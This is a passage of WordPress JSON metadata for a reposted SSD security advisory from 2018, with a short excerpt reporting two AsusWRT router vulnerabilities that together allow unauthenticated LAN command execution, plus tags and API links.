style=\"border:none;-webkit-box-shadow:none; box-shadow:none;\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\" alt=\"Print Friendly, PDF &#038; Email\" \/><\/a><\/div>\n<\/div><\/div>\n<p><a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3589\" target=\"bwo\" >https:\/\/blogs.securiteam.com\/index.php\/feed<\/a><\/p>\n","protected":false},"excerpt":{"rendered":"<p><img decoding=\"async\" src=\"https:\/\/cdn.printfriendly.com\/buttons\/printfriendly-button.png\"\/><\/p>\n<p><strong>Credit to Author: SSD \/ Maor Schwartz| Date: Mon, 22 Jan 2018 11:50:36 +0000<\/strong><\/p>\n<p>Vulnerabilities Summary The following advisory describes two (2) vulnerabilities found in AsusWRT Version 3.0.0.4.380.7743. The combination of the vulnerabilities leads to LAN remote command execution on any Asus router. AsusWRT is &#8220;THE POWERFUL USER-FRIENDLY INTERFACE &#8211; The enhanced ASUSWRT graphical user interface gives you easy access to the 30-second, 3-step web-based installation process. It\u2019s also &#8230; <a href=\"https:\/\/blogs.securiteam.com\/index.php\/archives\/3589\" class=\"more-link\">Continue reading <span class=\"screen-reader-text\">SSD Advisory \u2013 Hack2Win &#8211; Asus Unauthenticated LAN Remote Command Execution<\/span><\/a><\/p>\n","protected":false},"author":4,"featured_media":0,"comment_status":"open","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"colormag_page_container_layout":"default_layout","colormag_page_sidebar_layout":"default_layout","footnotes":""},"categories":[10643,10754],"tags":[16780,12603,11851,10757,12136,17050],"class_list":["post-11196","post","type-post","status-publish","format-standard","hentry","category-independent","category-securiteam","tag-configuration-reset","tag-hack2win","tag-remote-command-execution","tag-securiteam-secure-disclosure","tag-unauthenticated-action","tag-unauthorized-access"],"_links":{"self":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11196","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/comments?post=11196"}],"version-history":[{"count":0,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/posts\/11196\/revisions"}],"wp:attachment":[{"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/media?parent=11196"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/categories?post=11196"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/www.palada.net\/index.php\/wp-json\/wp\/v2\/tags?post=11196"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}